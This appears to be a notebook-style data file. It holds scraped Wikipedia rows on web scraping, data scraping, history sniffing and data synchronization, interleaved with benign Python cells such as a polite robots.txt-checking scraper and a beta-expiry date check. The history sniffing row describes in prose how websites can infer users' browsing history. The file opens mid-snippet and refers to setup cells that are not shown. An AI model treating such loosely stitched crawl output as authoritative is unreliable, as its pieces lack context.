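EXPIRY = date(2007, 5, 31)  # hypothetical hard-coded expiry, echoing the Vista Beta 2 example

def main():
    # The "bomb": refuse to run once the hard-coded date has passed.
    # It relies on the system clock, which is one reason such checks are only weakly enforced.
    if date.today() > EXPIRY:
        raise SystemExit("This beta build expired on " + EXPIRY.isoformat())
    print("Beta build running normally.")

if __name__ == "__main__":
    main()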
232 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Wikipedia:Community_portal | This page provides a listing of current collaborations, tasks, and news about English Wikipedia. New to Wikipedia? See the contributing to Wikipedia page or our tutorial for everything you need to know to get started. For a listing of internal project pages of interest, see the department directory. For a listing of ongoing discussions and current requests, see the Dashboard. Welcome to the community bulletin board, which is a page used for announcements from WikiProjects and other groups. Included here are coordinated efforts, events, projects, and other general announcements. Yearly or infrequent events Monthly or continuous events Also consider posting WikiProject, Task Force, and Collaboration news at The Signpost's WikiProject Report page. Please include your signature when adding a listing here. Latest tech news from the Wikimedia technical community. Please tell other users about these changes. Not all changes will affect you. Translations are available. Feature news Project updates Tech news prepared by Tech News writers and posted by bot Contribute Translate Get help Give feedback Subscribe or unsubscribe. Discussions in the following areas have requested wider attention via Requests for comment: You can help improve the articles listed below This list updates frequently, so check back here for more tasks to try. (See Wikipedia:Maintenance or the Task Center for further information.) Help counter systemic bias by creating new articles on important women. Help improve popular pages, especially those of low quality. This week's article for improvement is: Social experiment Previous selections: Happiness List of public art in Chicago Cape (geography) This week's backlog of the week is: Category:Pages with reference errors What is an appropriate length for a Wikipedia article? This is discussed at Article length. An article can be as long as 10,000 words or more, if there are enough sources on the topic to provide for that much content. Undoubtedly there are articles that reach 20,000 words. The recommended maximum length is around 100kB of text. There is no standard for minimum length, an acceptable stub article could be as short as three or four sentences. If you look at the menu on the right-hand side of any page on Wikipedia, there is a link to Page information. Clicking on that link shows lots of information about the page including its total size as well as how often it has been viewed. There is also this tool - you just copy and paste the text into there, and it counts it for you. Kindness Campaign |
233 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-25 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating terms of use that prohibit data scraping will be a violation of contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
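The specific countermeasures are truncated in this extract, but they typically include rate limiting, IP blocking, and robots.txt rules. From the scraper's side, a simple way to avoid triggering such defences (and to stay within a site's stated policy) is to check robots.txt and pace requests. Below is a minimal sketch using requests plus the standard library's robotparser; the target URL and user-agent string are placeholders, not a real site.

import time
from urllib import robotparser

import requests

# Hypothetical target; swap in a site you are actually allowed to scrape.
BASE_URL = "https://example.com"
USER_AGENT = "polite-research-bot/0.1"

# Read robots.txt once, then consult it before every fetch.
rp = robotparser.RobotFileParser()
rp.set_url(f"{BASE_URL}/robots.txt")
rp.read()

def polite_get(path, delay=2.0):
    url = f"{BASE_URL}{path}"
    if not rp.can_fetch(USER_AGENT, url):
        raise PermissionError(f"robots.txt disallows fetching {url}")
    time.sleep(delay)  # crude rate limit: at most one request every `delay` seconds
    return requests.get(url, headers={"User-Agent": USER_AGENT}, timeout=10)

# Example: response = polite_get("/index.html")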
234 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Data_scraping | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. 
Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today, for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50-year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management—could be said to be an example of robotic process automation software, called RPA, or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24×80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data into numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX/VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or, for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 In the case of GUI applications, this can be combined with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner.
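The "page shredding" workflow described above, turning fixed-format, human-readable character data back into numbers, can be approximated in a few lines. The sketch below parses a made-up report layout with a regular expression and loads the result into a pandas DataFrame; the report text and field names are invented for illustration, and a real legacy report would need its own pattern.

import re
import pandas as pd

# Hypothetical human-readable output, as a legacy program might print it.
report = """\
ORDER 10021   CUST: ACME CORP      TOTAL:   $1,250.00
ORDER 10022   CUST: GLOBEX INC     TOTAL:     $310.50
"""

# The layout here is assumed; adapt the pattern to the real report format.
pattern = re.compile(r"ORDER\s+(\d+)\s+CUST:\s+(.+?)\s+TOTAL:\s+\$([\d,]+\.\d{2})")

rows = []
for line in report.splitlines():
    m = pattern.search(line)
    if m:
        order_id, customer, total = m.groups()
        rows.append({"order_id": int(order_id),
                     "customer": customer.strip(),
                     "total": float(total.replace(",", ""))})

df = pd.DataFrame(rows)
print(df)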
7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
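As a small illustration of the report mining idea above, the sketch below assumes a system has printed a report to an HTML file; pandas can then recover the tabular data offline with read_html, which relies on a parser such as html5lib or bs4 (both installed at the top of this notebook). The report content here is invented.

import pandas as pd
from io import StringIO

# Hypothetical spooled report: many systems can print reports to an HTML file,
# which can then be mined offline without touching the source system's API.
html_report = """
<h1>Monthly Sales Report</h1>
<table>
  <tr><th>Region</th><th>Units</th><th>Revenue</th></tr>
  <tr><td>North</td><td>120</td><td>4800</td></tr>
  <tr><td>South</td><td>95</td><td>3990</td></tr>
</table>
"""

# read_html returns one DataFrame per <table> found in the document.
tables = pd.read_html(StringIO(html_report))
sales = tables[0]
print(sales)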
235 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/History_sniffing | History sniffing is a class of web vulnerabilities and attacks that allow a website to track a user's web browsing history activities by recording which websites a user has visited and which the user has not. This is done by leveraging long-standing information leakage issues inherent to the design of the web platform, one of the most well-known of which includes detecting CSS attribute changes in links that the user has already visited. Despite being known about since 2002, history sniffing is still considered an unsolved problem. In 2010, researchers revealed that multiple high-profile websites had used history sniffing to identify and track users. Shortly afterwards, Mozilla and all other major web browsers implemented defences against history sniffing. However, recent research has shown that these mitigations are ineffective against specific variants of the attack and history sniffing can still occur via visited links and newer browser features. Early browsers such as Mosaic and Netscape Navigator were built on the model of the web being a set of statically linked documents known as pages. In this model, it made sense for the user to know which documents they had previously visited and which they hadn't, regardless of which document was referring to them. 1 Mosaic, one of the earliest graphical web browsers, used purple links to show that a page had been visited and blue links to show pages that had not been visited. 2 3 This paradigm stuck around and was subsequently adopted by all modern web browsers. 4 Over the years, the web evolved from its original model of static content towards more dynamic content. In 1995, employees at Netscape added a scripting language, Javascript, to its flagship web browser, Netscape Navigator. This addition allowed users to add interactivity to the web page via executing Javascript programs as part of the rendering process. 5 6 However, this addition came with a new security problem, that of these Javascript programs being able to access each other's execution context and sensitive information about the user. As a result, shortly afterwards, Netscape Navigator introduced the same-origin policy. This security measure prevented Javascript from being able to arbitrarily access data in a different web page's execution context. 7 However, while the same-origin policy was subsequently extended to cover a large variety of features introduced before its existence, it was never extended to cover hyperlinks since it was perceived to hurt the user's ability to browse the web. 4 This innocuous omission would manifest into one of the well known and earliest forms of history sniffing known on the web. 8 One of the first publicly disclosed reports of a history sniffing exploit was made by Andrew Clover from Purdue University in a mailing list post on BUGTRAQ in 2002. The post detailed how a malicious website could use Javascript to determine if a given link was of a specific colour, thus revealing if the link had been previously visited. 9 While this was initially thought of to be a theoretical exploit with little real-world value, later research by Jang et al. in 2010 revealed that high-profile websites were using this technique in the wild to reveal user browsing data. 10 As a result multiple lawsuits were filed against the websites that were found to have used history sniffing alleging a violation of the Computer Fraud and Abuse Act of 1986. 8 In the same year, L. 
David Baron from Mozilla Corporation developed a defence against the attack that all major browsers would later adopt. The defence included restrictions against what kinds of CSS attributes could be used to style visited links. The ability to add background images and CSS transitions to links was disallowed. Additionally, visited links would be treated identically to standard links, with Javascript application programming interfaces (APIs) that allow the website to query the color of specific elements returning the same attributes for a visited link as for non-visited links. This ensured malicious websites could not simply infer a person's browsing history by querying the colour changes. 11 In 2011, research by then-Stanford graduate student Jonathan Mayer found that advertising company Epic Marketplace Inc. had used history sniffing to collect information about the browsing history of users across the web. 12 13 A subsequent investigation by the Federal Trade Commission (FTC) revealed that Epic Marketplace had used history sniffing code as a part of advertisements in over 24,000 web domains, including ESPN and Papa Johns. The Javascript code allowed Epic Marketplace to track whether a user had visited any of over 54,000 domains. 14 15 The resulting data was subsequently used by Epic Marketplace to categorize users into specific groups and serve advertisements based on the websites the user had visited. As a result of this investigation, the FTC banned Epic Marketplace Inc. from conducting any form of online advertising and marketing for twenty years and ordered it to permanently delete the data it had collected. 16 15 The threat model of history sniffing relies on the adversary being able to direct the victim to a malicious website entirely or partially under the adversary's control. The adversary can accomplish this by compromising a previously good web page, by phishing the user to a web page allowing the adversary to load arbitrary code, or by using a malicious advertisement on an otherwise safe web page. 8 17 While most history sniffing attacks do not require user interactions, specific variants of the attacks need users to interact with particular elements which can often be disguised as buttons, browser games, CAPTCHAs, and other such elements. 4 Despite being partially mitigated in 2010, history sniffing is still considered an unsolved problem. 8 In 2011, researchers at Carnegie Mellon University showed that while the defences proposed by Mozilla were sufficient to prevent most non-interactive attacks, such as those found by Jang et al., they were ineffective against interactive attacks. By showing users overlaid letters, numbers and patterns, which would only reveal themselves if a user had visited a specific website, the researchers were able to trick 307 participants into potentially revealing their browsing history via history sniffing. This was done by presenting the activities in the form of pattern-solving problems, chess games and CAPTCHAs. 18 4 In 2018, researchers at the University of California, San Diego demonstrated timing attacks that could bypass the mitigations introduced by Mozilla. By abusing the CSS paint API (which allows developers to draw a background image programmatically) and targeting the bytecode cache of the browser, the researchers were able to measure how long it took to paint specific links. Thus, they were able to provide probabilistic techniques for identifying visited websites.
19 20 Since 2019, multiple history sniffing attacks have been found targeting various newer features browsers provide. In 2020, Sanchez-Rola et al. demonstrated that by measuring the time a server takes to respond to a request with HTTP cookies and then comparing it to how long it took for a server to respond without cookies, a website could perform history sniffing. 21 In 2023, Ali et al. demonstrated that newly introduced browser features could also be abused to perform history sniffing. One particularly notable example highlighted was the fact that a recently introduced feature, the Private Tokens API, introduced under Google's Privacy Sandbox initiative with the intention of preventing user tracking, could allow malicious actors to exfiltrate users' browsing data by using techniques similar to those used for cross-site leak attacks. 22 |
236 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_synchronization | Data synchronization is the process of establishing consistency between source and target data stores, and the continuous harmonization of the data over time. It is fundamental to a wide variety of applications, including file synchronization and mobile device synchronization. Data synchronization can also be useful in encryption for synchronizing public key servers. Data synchronization is needed to update and keep multiple copies of a set of data coherent with one another or to maintain data integrity. 1 For example, database replication is used to keep multiple copies of data synchronized with database servers that store data in different locations. Examples include: Some of the challenges which users may face in data synchronization: Data formats tend to grow more complex with time as the organization grows and evolves. This results not only in building simple interfaces between the two applications (source and target), but also in a need to transform the data while passing them to the target application. ETL (extraction, transformation, loading) tools can be helpful at this stage for managing data format complexities. In real-time systems, customers want to see the current status of their order in an e-shop, the current status of a parcel delivery (real-time parcel tracking), the current balance on their account, etc. This shows the need for a real-time system that is updated as well, to enable a smooth manufacturing process in real time, e.g., ordering material when the enterprise is running out of stock, synchronizing customer orders with the manufacturing process, etc. There are many real-life examples where real-time processing gives a successful and competitive advantage. There are no fixed rules and policies to enforce data security. It may vary depending on the system being used. Even though the security is maintained correctly in the source system which captures the data, the security and information access privileges must be enforced on the target systems as well to prevent any potential misuse of the information. This is a serious issue, particularly when it comes to handling secret, confidential, and personal information. Because of this sensitivity and confidentiality, data transfer and all in-between information must be encrypted. Data quality is another serious constraint. For better management and to maintain good quality of data, the common practice is to store the data in one location and share it with different people and different systems and/or applications in different locations. It helps in preventing inconsistencies in the data. There are five different phases involved in the data synchronization process: Each of these steps is critical. In case of large amounts of data, the synchronization process needs to be carefully planned and executed to avoid any negative impact on performance. There are tools available for file synchronization, version control (CVS, Subversion, etc.), distributed filesystems (Coda, etc.), and mirroring (rsync, etc.), in that all these attempt to keep sets of files synchronized. However, only version control and file synchronization tools can deal with modifications to more than one copy of the files. Several theoretical models of data synchronization exist in the research literature, and the problem is also related to the problem of Slepian–Wolf coding in information theory.
The models are classified based on how they consider the data to be synchronized. The problem of synchronizing unordered data (also known as the set reconciliation problem) is modeled as an attempt to compute the symmetric difference S_A ⊕ S_B = (S_A − S_B) ∪ (S_B − S_A) between two remote sets S_A and S_B of b-bit numbers. 3 Some solutions to this problem are typified by: In this case, two remote strings σ_A and σ_B need to be reconciled. Typically, it is assumed that these strings differ by up to a fixed number of edits (i.e. character insertions, deletions, or modifications). Then data synchronization is the process of reducing the edit distance between σ_A and σ_B, down to the ideal distance of zero. This is applied in all filesystem-based synchronizations (where the data is ordered). Many practical applications of this are discussed or referenced above. It is sometimes possible to transform the problem to one of unordered data through a process known as shingling (splitting the strings into shingles). 7 In fault-tolerant systems, distributed databases must be able to cope with the loss or corruption of (part of) their data. The first step is usually replication, which involves making multiple copies of the data and keeping them all up to date as changes are made. However, it is then necessary to decide which copy to rely on when loss or corruption of an instance occurs. The simplest approach is to have a single master instance that is the sole source of truth. Changes to it are replicated to other instances, and one of those instances becomes the new master when the old master fails. Paxos and Raft are more complex protocols that exist to solve problems with transient effects during failover, such as two instances thinking they are the master at the same time. Secret sharing is useful if failures of whole nodes are very common. This moves synchronization from an explicit recovery process to being part of each read, where a read of some data requires retrieving encoded data from several different nodes. If corrupt or out-of-date data may be present on some nodes, this approach may also benefit from the use of an error correction code. DHTs and blockchains try to solve the problem of synchronization between many nodes (hundreds to billions). |
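For the unordered (set reconciliation) model above, the definition of the symmetric difference translates directly into Python set operations. This is only the definition in code: practical protocols avoid shipping the full sets across the network, using structures such as characteristic polynomials or invertible Bloom filters. The item identifiers below are made up.

# Naive illustration of set reconciliation: each side holds a set of
# identifiers, and synchronization amounts to computing the symmetric
# difference and exchanging the missing items.
set_a = {101, 102, 103, 107}   # items held by host A (hypothetical)
set_b = {101, 103, 104}        # items held by host B (hypothetical)

missing_on_b = set_a - set_b           # A must send these to B
missing_on_a = set_b - set_a           # B must send these to A
symmetric_difference = set_a ^ set_b   # everything that differs

print("A -> B:", missing_on_b)
print("B -> A:", missing_on_a)
print("S_A xor S_B:", symmetric_difference)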
